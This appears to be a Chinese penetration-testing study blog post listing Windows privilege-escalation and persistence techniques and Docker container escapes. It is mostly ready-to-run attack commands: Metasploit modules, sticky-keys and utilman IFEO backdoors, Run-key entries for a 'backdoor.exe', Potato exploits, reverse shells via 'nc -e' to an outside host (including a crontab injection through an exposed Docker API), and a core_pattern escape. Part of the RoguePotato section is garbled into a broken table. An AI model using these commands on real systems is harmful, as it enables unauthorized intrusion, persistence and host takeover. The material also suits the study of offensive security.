<h1 id="将systeminfo保存到文件"><a href="#将systeminfo保存到文件" class="headerlink" title="将systeminfo保存到文件"></a>将systeminfo保存到文件</h1><p>python2 windows-exploit-suggester.py –update # 更新漏洞数据库</p>
<p>python2 windows-exploit-suggester.py -d &lt;漏洞库文件&gt; -i sysinfo.txt</p>
<h2 id="Getsystem"><a href="#Getsystem" class="headerlink" title="Getsystem"></a>Getsystem</h2><p>msf:</p>
<p>meterpreter &gt; getsystem</p>
<h2 id="UAC提权"><a href="#UAC提权" class="headerlink" title="UAC提权"></a>UAC提权</h2><p><img src="https://cdn.nlark.com/yuque/0/2025/png/42988179/1741499483585-c2bf641b-c755-4bd7-818b-2424c644f975.png" srcset="/img/loading.gif" lazyload> msf</p>
<p>windows&#x2F;local&#x2F;bypassuac模块 <img src="https://cdn.nlark.com/yuque/0/2025/png/42988179/1741499483742-4d66f526-aa1d-4198-be64-b0bfa07aac32.png" srcset="/img/loading.gif" lazyload> 注册表</p>
<p>注意 windows 2008 及以上系统在默认情况下开启 UAC 策略, 不允许 administrator 以外的其它本地管理员用户访问远程资源.</p>
<p>可通过更改注册表关闭 UAC 策略.</p>
<p>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system &#x2F;v LocalAccountTokenFilterPolicy &#x2F;t REG_DWORD &#x2F;d 1 &#x2F;f</p>
<h2 id="令牌窃取"><a href="#令牌窃取" class="headerlink" title="令牌窃取"></a>令牌窃取</h2><p>msf:</p>
<p>use incognito #进入incognito模块 list_tokens -u #列出令牌</p>
<p>impersonate_token “WIN-HN02RO8B2OU\86158” #模仿令牌（它没有扫描处我的靶机里面的 system权限的用户，所以我将就模仿）</p>
<h2 id="windows-系统配置错误提权"><a href="#windows-系统配置错误提权" class="headerlink" title="windows 系统配置错误提权"></a>windows 系统配置错误提权</h2><h3 id="系统服务权限配置错误"><a href="#系统服务权限配置错误" class="headerlink" title="系统服务权限配置错误"></a>系统服务权限配置错误</h3><p>windows系统服务文件在操作系统启动时加载执行，并在后台调用可执行文件。如果一个低权限的用户对此类系统服务调用的可执行文件拥有写权限，那么就可以替换该文件，并随着系统启动获得控制权限。</p>
<p>msf</p>
<p>use exploit&#x2F;windows&#x2F;local&#x2F;service_permissions</p>
<p>service_permissions模块会使用 两种方式获取system权限 如果以管理员权限运行 会尝试创建并运行一个新的服务 如果当前权限不允许创建服务 会判断哪些服务的文件或文件夹的权限有问题 并对其进行劫持 在劫持服务时会创建一个可执行程序 其文件名和安装路径都是随机的</p>
<h3 id="注册表键AlwaysInstallElevated"><a href="#注册表键AlwaysInstallElevated" class="headerlink" title="注册表键AlwaysInstallElevated"></a>注册表键AlwaysInstallElevated</h3><p>允许低权限用户以System权限安装文件。如果启用此策略设置项，那么任何权限的用户都以NT Authority\System权限来安装恶意的MSI文件。</p>
<p>该模块会创建一个文件名随机的MSI文件 并在提权后删除所有已部署的文件</p>
<p>msf:</p>
<p>use exploit&#x2F;windows&#x2F;local&#x2F;always_install_elevated</p>
<h3 id="自动安装配置文件"><a href="#自动安装配置文件" class="headerlink" title="自动安装配置文件"></a>自动安装配置文件</h3><p>网络管理员在内网中给多台机器配置同一个环境时，通常不会逐个配置，而是使用脚本批量部署。在这个过程中，会使用安装配置文件。这些文件中包含所有的安装配置信息，其中一些还可能包含管理员账号和密码</p>
<p>msf:</p>
<p>use post&#x2F;windows&#x2F;gather&#x2F;enum_unattend</p>
<h3 id="组策略首选项提权"><a href="#组策略首选项提权" class="headerlink" title="组策略首选项提权"></a>组策略首选项提权</h3><p>msf:</p>
<p>use post&#x2F;windows&#x2F;gather&#x2F;credentials&#x2F;gpp</p>
<h3 id="映像劫持"><a href="#映像劫持" class="headerlink" title="映像劫持"></a>映像劫持</h3><p>注册表当前用户可修改。</p>
<p>注册表路径下IFEO（image file execution options）的exe程序被修改，然后进行重定向执行门程序的过程,也就是说你在执行A程序时候，由于IFEO劫持的原因执行了B程序</p>
<h1 id="RDP登录界面按Windows-键-U，获得一个SYSTEM权限的-cmd-exe"><a href="#RDP登录界面按Windows-键-U，获得一个SYSTEM权限的-cmd-exe" class="headerlink" title="RDP登录界面按Windows 键+U，获得一个SYSTEM权限的 cmd.exe"></a>RDP登录界面按Windows 键+U，获得一个SYSTEM权限的 cmd.exe</h1><blockquote>
<p>REG ADD “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe” &#x2F;t REG_SZ &#x2F;v Debugger &#x2F;d “C:\windows\system32\cmd.exe” &#x2F;f</p>
</blockquote>
<h1 id="在-RDP-登录屏幕时按多次shift"><a href="#在-RDP-登录屏幕时按多次shift" class="headerlink" title="在 RDP 登录屏幕时按多次shift"></a>在 RDP 登录屏幕时按多次shift</h1><blockquote>
<p>REG ADD “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe” &#x2F;t REG_SZ &#x2F;v Debugger &#x2F;d “C:\windows\system32\cmd.exe” &#x2F;f</p>
</blockquote>
<p>启动项：</p>
<blockquote>
<p>reg add “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run” &#x2F;v Evil</p>
</blockquote>
<p>&#x2F;t REG_SZ &#x2F;d “C:\Users\user\backdoor.exe”</p>
<blockquote>
<p>reg add “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce” &#x2F;v Evil &#x2F;t REG_SZ &#x2F;d “C:\Users\user\backdoor.exe”</p>
</blockquote>
<blockquote>
<p>reg add “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices”</p>
</blockquote>
<p>&#x2F;v Evil &#x2F;t REG_SZ &#x2F;d “C:\Users\user\backdoor.exe”</p>
<blockquote>
<p>reg add</p>
</blockquote>
<p>“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce” &#x2F;v Evil &#x2F;t REG_SZ &#x2F;d “C:\Users\user\backdoor.exe”</p>
<h3 id="service劫持"><a href="#service劫持" class="headerlink" title="service劫持"></a>service劫持</h3><p>修改以高权限用户执行的服务的imagepath。通过sc命令启动服务。</p>
<p>reg修改注册表</p>
<h2 id="power-up"><a href="#power-up" class="headerlink" title="power up"></a>power up</h2><p>使用 PowerUp 脚本可以快速的帮助我们发现系统弱点，从而实现提权的目的。</p>
<p>其中PowerUp.ps1文件可从这里下载：<a target="_blank" rel="noopener" href="https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc">https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc</a> beacon:</p>
<p>powershell-import PowerUp.ps1 powershell invoke-allchecks</p>
<p>如果在自己的靶机上发现导入ps1文件失败，这可能是因为系统不允许执行不信任的脚本文件导致的。</p>
<p>这时为了复现成功可以来到靶机下，以管理员权限打开 Powershell，运行set-ExecutionPolicy RemoteSigned，输入Y回车，此时系统便能导入PowerUp.ps1文件了。</p>
<h2 id="potato系列提权"><a href="#potato系列提权" class="headerlink" title="potato系列提权"></a>potato系列提权</h2><h3 id="Hot-potato"><a href="#Hot-potato" class="headerlink" title="Hot potato"></a>Hot potato</h3><p><a target="_blank" rel="noopener" href="https://github.com/Kevin-Robertson/Tater">https://github.com/Kevin-Robertson/Tater</a></p>
<p>Import-Module .\Tater.ps1</p>
<p>Invoke-Tater -Command “whoami”</p>
<h3 id="Rotten-Potato-JuicyPotato"><a href="#Rotten-Potato-JuicyPotato" class="headerlink" title="Rotten Potato &amp; JuicyPotato"></a>Rotten Potato &amp; JuicyPotato</h3><p><a target="_blank" rel="noopener" href="https://github.com/ohpe/juicy-potato">https://github.com/ohpe/juicy-potato</a></p>
<p>在指定 ip 和端口的位置尝试加载一个 COM 对象</p>
<p>RottenPotatoNG 使用的 COM 对象为 BITS，CLSID 为 {4991d34b-80a1-4291-83b6-3328366b9097}可供选择的 COM 对象不唯一，Juicy Potato 提供了多个，详细列表可参考如下地址： <a target="_blank" rel="noopener" href="https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md">https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md</a></p>
<p>RottenPotatoNG 使用的 135 端口</p>
<p>Juicy Potato 支持指定任意本地端口，但是 RPC 一般默认为135端口，很少被修改</p>
<p>clsid参考列表: <a target="_blank" rel="noopener" href="https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md">https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md</a></p>
<p>JuicyPotato.exe -t * -l 1112 -p exp.bat</p>
<p>参数</p>
<p>T:&gt;JuicyPotato.exe JuicyPotato v0.1</p>
<p>Mandatory args:</p>
<p>-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, &lt;*&gt; try both</p>
<p>-p <program>: program to launch</p>
<p>-l <port>: COM server listen port</p>
<p>Optional args:</p>
<p>-m <ip>: COM server listen address (default 127.0.0.1)</p>
<p>-a <argument>: command line argument to pass to program (default NULL)</p>
<p>-k <ip>: RPC server ip address (default 127.0.0.1)</p>
<p>-n <port>: RPC server listen port (default 135)</p>
<p>-c &lt;{clsid}&gt;: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})</p>
<p>-z only test CLSID and print token’s user</p>
<p>可以根据系统选择clsid，test_clsid.bat可以测试可用的clsid（<a target="_blank" rel="noopener" href="https://github.com/ohpe/juicy-">https://github.com/ohpe/juicy-</a> potato&#x2F;blob&#x2F;master&#x2F;Test&#x2F;test_clsid.bat）</p>
<h3 id="PrintSpoofer-PipePotato-or-BadPotato"><a href="#PrintSpoofer-PipePotato-or-BadPotato" class="headerlink" title="PrintSpoofer (PipePotato or BadPotato)"></a>PrintSpoofer (PipePotato or BadPotato)</h3><p><a target="_blank" rel="noopener" href="https://github.com/itm4n/PrintSpoofer">https://github.com/itm4n/PrintSpoofer</a></p>
<p>PrintSpoofer.exe -c “C:\TOOLS\nc.exe 10.10.13.37 1337 -e cmd”</p>
<h3 id="RoguePotato"><a href="#RoguePotato" class="headerlink" title="RoguePotato"></a>RoguePotato</h3><p><a target="_blank" rel="noopener" href="https://github.com/antonioCoco/RoguePotato">https://github.com/antonioCoco/RoguePotato</a></p>
<h1 id="先在vps上监听端口"><a href="#先在vps上监听端口" class="headerlink" title="先在vps上监听端口"></a>先在vps上监听端口</h1><p>socat tcp-listen:135,reuseaddr,fork tcp:10.0.0.3:9999</p>
<p>{6d8ff8e1-730d-11d4-bf42-00b0d0118b56}” -p splintercode</p>
<table>
<thead>
<tr>
<th></th>
<th></th>
<th></th>
<th></th>
<th></th>
<th></th>
</tr>
</thead>
<tbody><tr>
<td># 或者nc<br><br>while true; do nc -l -p 135 -c nc -l -p 135 | nc 0.0.0.0 9999</td>
<td>‘nc 0.0.0.0 9999’; done</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>RoguePotato.exe -r 10.0.0.3 -e</td>
<td>“C:\windows\system32\cmd.exe”</td>
<td>-l</td>
<td>9999</td>
<td></td>
<td></td>
</tr>
<tr>
<td># 或者自己选择clsid和管道<br><br>RoguePotato.exe -r 10.0.0.3 -e</td>
<td>“C:\windows\system32\cmd.exe”</td>
<td>-l</td>
<td>9999</td>
<td>-c</td>
<td>“</td>
</tr>
</tbody></table>
<h3 id="SweetPotato"><a href="#SweetPotato" class="headerlink" title="SweetPotato"></a>SweetPotato</h3><p>COM&#x2F;WinRM&#x2F;Spoolsv 的集合版，也就是 Juicy&#x2F;PrintSpoofer 的集合版 <a target="_blank" rel="noopener" href="https://github.com/CCob/SweetPotato">https://github.com/CCob/SweetPotato</a> <a target="_blank" rel="noopener" href="https://github.com/uknowsec/SweetPotato">https://github.com/uknowsec/SweetPotato</a></p>
<p>SweetPotato.exe -a “whoami”</p>
<h2 id="权限维持-1"><a href="#权限维持-1" class="headerlink" title="权限维持"></a>权限维持</h2><h3 id="添加用户-1"><a href="#添加用户-1" class="headerlink" title="添加用户"></a>添加用户</h3><p>添加高权限用户</p>
<p>net user <username> <password> &#x2F;add</p>
<p>net localgroup administrators fushuling &#x2F;add</p>
<p>登录以后以管理员权限运行cmd</p>
<p>powershell -Command “Start-Process cmd -Verb RunAs” exit</p>
<h1 id="或者"><a href="#或者" class="headerlink" title="或者"></a>或者</h1><p>echo <password> | runas &#x2F;user:administrator cmd exit</p>
<h1 id="docker逃逸"><a href="#docker逃逸" class="headerlink" title="docker逃逸"></a>docker逃逸</h1><h2 id="docker-sock挂载逃逸"><a href="#docker-sock挂载逃逸" class="headerlink" title="docker.sock挂载逃逸"></a>docker.sock挂载逃逸</h2><p><strong>Docker Client 和 Docker Daemon</strong></p>
<p><img src="https://cdn.nlark.com/yuque/0/2025/png/42988179/1741499483915-bec315df-06bf-4e8f-a322-22b0c30a8714.png" srcset="/img/loading.gif" lazyload> Docker Client：这是用户通过命令行与 Docker 进行交互的工具（例如你输入的 docker run 命令）。它提供了一个用户界面来管理 Docker 容器和镜像。</p>
<p><img src="https://cdn.nlark.com/yuque/0/2025/png/42988179/1741499484115-ed238339-1d1a-42cc-9c6a-192266447dd5.png" srcset="/img/loading.gif" lazyload> Docker Daemon：后台运行的服务（进程），负责管理 Docker 容器的创建、运行、停止等操作。它接收来自 Docker Client 的请求，并处理这些请求。</p>
<p>需要挂载&#x2F;var&#x2F;run&#x2F;docker.sock，并在容器内安装docker。</p>
<p>挂载宿主机docker.sock后，使用docker运行容器等操作时连接的是宿主机的docker daemon。</p>
<p><strong>利用</strong></p>
<p>apt-get update</p>
<p>apt-get install docker.io</p>
<p>docker run -it -v &#x2F;:&#x2F;host ubuntu:18.04 &#x2F;bin&#x2F;bash # 将宿主机&#x2F;挂载到新容器的&#x2F;host。</p>
<h1 id="以上均在容器内执行。"><a href="#以上均在容器内执行。" class="headerlink" title="以上均在容器内执行。"></a>以上均在容器内执行。</h1><h2 id="挂载proc"><a href="#挂载proc" class="headerlink" title="挂载proc"></a>挂载proc</h2><p>从 2.6.19 内核版本开始，Linux 支持在 &#x2F;proc&#x2F;sys&#x2F;kernel&#x2F;core_pattern 中使用新语法。如果该文件中的首个字符是管道符 | ，那么该行的剩余内容将被当作用户空间程序或脚本解释并执行。</p>
<p>触发点在于&#x2F;proc&#x2F;sys&#x2F;kernel&#x2F;core_pattern负责配置进程崩溃时内存转储数据的导出方式。如果程序崩溃就会执行我们的命令</p>
<p>查找容器内core_pattern</p>
<p>find &#x2F; -name core_pattern</p>
<p>如果找到两个 core_pattern 文件，那可能就是挂载了宿主机的 procfs</p>
<p><strong>找到docker中文件对应宿主机的绝对路径：</strong></p>
<p>cat &#x2F;proc&#x2F;mounts | xargs -d ‘,’ -n 1 | grep workdir</p>
<p>找到的路径是宿主机中对应容器根目录的路径。</p>
<p><strong>执行命令脚本：</strong></p>
<p>#!&#x2F;bin&#x2F;bash</p>
<p>touch &#x2F;tmp&#x2F;ppp</p>
<p><strong>崩溃程序：</strong> 用gcc编译</p>
<p>#include&lt;stdio.h&gt; int main(void) {</p>
<p>int *a &#x3D; NULL;</p>
<p>*a &#x3D; 1;</p>
<p>return 0;</p>
<p>}</p>
<p><strong>写入core_pattern:</strong></p>
<p>echo</p>
<p>“|&#x2F;var&#x2F;lib&#x2F;docker&#x2F;overlay2&#x2F;82e9bf4baeaeef452bc9cf50a4c7ca11c8e108fe51e5f70546211fe 46a06678c&#x2F;merged&#x2F;tmp&#x2F;.lll.sh” &gt; &#x2F;host&#x2F;proc&#x2F;sys&#x2F;kernel&#x2F;core_pattern</p>
<p>然后在容器内执行崩溃程序即可逃逸。</p>
<h2 id="特权模式"><a href="#特权模式" class="headerlink" title="特权模式"></a>特权模式</h2><p><strong>查看是否以特权模式启动</strong></p>
<p>cat &#x2F;proc&#x2F;self&#x2F;status | grep CapEff</p>
<p>如果是以特权模式启动的话，CapEff 对应的掩码值应该为0000003fffffffff 或者是 0000001fffffffff</p>
<p><strong>利用</strong></p>
<h1 id="查找磁盘位置"><a href="#查找磁盘位置" class="headerlink" title="查找磁盘位置"></a>查找磁盘位置</h1><p>fdisk -l</p>
<h1 id="挂载磁盘到我们的目录"><a href="#挂载磁盘到我们的目录" class="headerlink" title="挂载磁盘到我们的目录"></a>挂载磁盘到我们的目录</h1><p>mkdir &#x2F;lll &amp;&amp; mount &#x2F;dev&#x2F;sda1 &#x2F;lll</p>
<h2 id="docker未授权访问"><a href="#docker未授权访问" class="headerlink" title="docker未授权访问"></a>docker未授权访问</h2><p><strong>docker启动http api：</strong></p>
<p>dockerd -H unix:&#x2F;&#x2F;&#x2F;var&#x2F;run&#x2F;docker.sock -H 0.0.0.0:2375</p>
<p>执行命令：</p>
<p>POST &#x2F;containers&#x2F;<container_id>&#x2F;exec HTTP&#x2F;1.1 Host: <docker_host>:PORT</p>
<p>Content-Type: application&#x2F;json Content-Length: 188</p>
<p>{</p>
<p>“AttachStdin”: true, “AttachStdout”: true, “AttachStderr”: true,</p>
<p>“Cmd”: [“命令”, “参数”],</p>
<p>比如（cat &#x2F;etc&#x2F;passwd）</p>
<p>“DetachKeys”: “ctrl-p,ctrl-q”, “Privileged”: true,</p>
<p>“Tty”: true</p>
<p>}</p>
<p>定时任务逃逸：</p>
<p>import docker</p>
<p>client &#x3D; docker.DockerClient(base_url&#x3D;’<a target="_blank" rel="noopener" href="http://your-ip:2375/">http://your-ip:2375/</a>‘)</p>
<p>data &#x3D; client.containers.run(‘alpine:latest’, r’’’sh -c “echo ‘* * * * *</p>
<p>&#x2F;usr&#x2F;bin&#x2F;nc your-ip 21 -e &#x2F;bin&#x2F;sh’ &gt;&gt; &#x2F;tmp&#x2F;etc&#x2F;crontabs&#x2F;root” ‘’’, remove&#x3D;True, volumes&#x3D;{‘&#x2F;etc’: {‘bind’: ‘&#x2F;tmp&#x2F;etc’, ‘mode’: ‘rw’}})</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" class="print-no-link">#渗透测试</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>渗透入门</div>
      <div>http://example.com/2025/01/21/渗透测试/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>Author</div>
          <div>chaye</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>January 21, 2025</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>Licensed under</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/02/21/hint/" title="metaploit-hint">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">metaploit-hint</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/01/14/docker/" title="docker">
                        <span class="hidden-mobile">docker</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
